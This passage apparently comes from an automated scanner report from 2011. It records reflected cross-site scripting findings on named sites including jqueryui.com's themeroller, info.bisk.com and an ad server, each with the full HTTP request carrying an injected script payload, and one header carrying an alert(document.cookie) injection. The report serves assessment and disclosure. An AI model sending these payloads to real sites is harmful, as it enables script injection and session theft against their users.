GET /content/0/14302/119028/OI_revised_60days_baker_160x600.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-23636-2%3Fmpt%3D%5BCACHEBUSTER%5D&mpjs=puma.vizu.com%2Fcdn%2F00%2F00%2F14%2F09%2Ftracking_only.js%3Fadid%3Demm%3Bsiteid%3Downeriq%3B&mpt=[CACHEBUSTER]&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa5/3/0/%2a/o%3B235018855%3B0-0%3B0%3B41185174%3B2321-160/600%3B40066933/40084720/1%3Bu%3Dsid_%3B%7Esscs%3D%3f47ebf"%3balert(1)//9d047a6ebcf&placementid=14302119028236362& HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=517004695355; mojo3=14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/1551:17023/11293:3113
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:26:34 GMT Server: Apache Last-Modified: Thu, 13 Jan 2011 22:58:30 GMT ETag: "401ef4-cdb-499c241979180" Accept-Ranges: bytes Content-Length: 6140 Content-Type: application/x-javascript
The value of the placementid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 618f1"%3balert(1)//26cf8ec9bd2 was submitted in the placementid parameter. This input was echoed as 618f1";alert(1)//26cf8ec9bd2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/14302/119028/OI_revised_60days_baker_160x600.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-23636-2%3Fmpt%3D%5BCACHEBUSTER%5D&mpjs=puma.vizu.com%2Fcdn%2F00%2F00%2F14%2F09%2Ftracking_only.js%3Fadid%3Demm%3Bsiteid%3Downeriq%3B&mpt=[CACHEBUSTER]&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa5/3/0/%2a/o%3B235018855%3B0-0%3B0%3B41185174%3B2321-160/600%3B40066933/40084720/1%3Bu%3Dsid_%3B%7Esscs%3D%3f&placementid=14302119028236362618f1"%3balert(1)//26cf8ec9bd2& HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=517004695355; mojo3=14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/1551:17023/11293:3113
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:26:43 GMT Server: Apache Last-Modified: Thu, 13 Jan 2011 22:58:30 GMT ETag: "401ef4-cdb-499c241979180" Accept-Ranges: bytes Content-Length: 5804 Content-Type: application/x-javascript
4.68. http://info.bisk.com/MCIndex.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://info.bisk.com
Path:
/MCIndex.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f75cf"-alert(1)-"c3877463769 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /MCIndex.asp?f75cf"-alert(1)-"c3877463769=1 HTTP/1.1 Host: info.bisk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 06 Feb 2011 16:01:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 394 Content-Type: text/html Set-Cookie: MCIDtype=external; expires=Tue, 08-Mar-2011 05:00:00 GMT; path=/ Set-Cookie: MCIDCookie=9505; expires=Tue, 08-Mar-2011 05:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDCABBARTR=EPJKGAOCFCMPMMHKGHCFKEBH; path=/ Cache-control: private
The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload 9f560<script>alert(1)</script>1513e10fdfb was submitted in the ct parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=769&ct=BASELINE_ROS9f560<script>alert(1)</script>1513e10fdfb&tr=INTERNAL_PAGE&num=3&layt=1&fmt=simp HTTP/1.1 Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 06 Feb 2011 13:21:35 GMT Server: Microsoft-IIS/6.0 Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Sun, 06 Feb 2011 13:21:35 GMT Content-Type: application/x-javascript Content-Length: 83
// Error: Unknown old section BASELINE_ROS9f560<script>alert(1)</script>1513e10fdfb
4.70. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jlinks.industrybrains.com
Path:
/jsct
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 13049<script>alert(1)</script>e6e2064dba1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=769&ct=BASELINE_ROS&tr=INTERNAL_PAGE&num=3&layt=1&fmt=simp&13049<script>alert(1)</script>e6e2064dba1=1 HTTP/1.1 Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 06 Feb 2011 13:21:54 GMT Server: Microsoft-IIS/6.0 Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Sun, 06 Feb 2011 13:21:54 GMT Content-Type: application/x-javascript Content-Length: 69
The value of the tr request parameter is copied into the HTML document as plain text between tags. The payload 474a3<script>alert(1)</script>94d1d0b707f was submitted in the tr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=769&ct=BASELINE_ROS&tr=INTERNAL_PAGE474a3<script>alert(1)</script>94d1d0b707f&num=3&layt=1&fmt=simp HTTP/1.1 Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 06 Feb 2011 13:21:38 GMT Server: Microsoft-IIS/6.0 Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Sun, 06 Feb 2011 13:21:38 GMT Content-Type: application/x-javascript Content-Length: 88
// Error: Site 769 has no section INTERNAL_PAGE474a3<script>alert(1)</script>94d1d0b707f
The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0c15"><script>alert(1)</script>c02b562b769 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842Dd0c15"><script>alert(1)</script>c02b562b769&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120095
The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8585"><script>alert(1)</script>9328a0e8c14 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1Dd8585"><script>alert(1)</script>9328a0e8c14&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:34 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8076"><script>alert(1)</script>de432bdbd5 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffffc8076"><script>alert(1)</script>de432bdbd5&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120092
The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73926"><script>alert(1)</script>490ba36911e was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec73926"><script>alert(1)</script>490ba36911e&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:13 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120095
The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58dc2"><script>alert(1)</script>76eadeed398 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A58dc2"><script>alert(1)</script>76eadeed398&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120095
The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66f98"><script>alert(1)</script>c6a44b7ce61 was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D366f98"><script>alert(1)</script>c6a44b7ce61&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:05 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120095
The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81892"><script>alert(1)</script>c31d3525fe7 was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F81892"><script>alert(1)</script>c31d3525fe7&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc392"><script>alert(1)</script>2a2e63ccd17 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaacc392"><script>alert(1)</script>2a2e63ccd17&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:19 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120095
The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db0b1"><script>alert(1)</script>cfa7796406f was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaadb0b1"><script>alert(1)</script>cfa7796406f&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f926f"><script>alert(1)</script>a58c2e437c9 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.
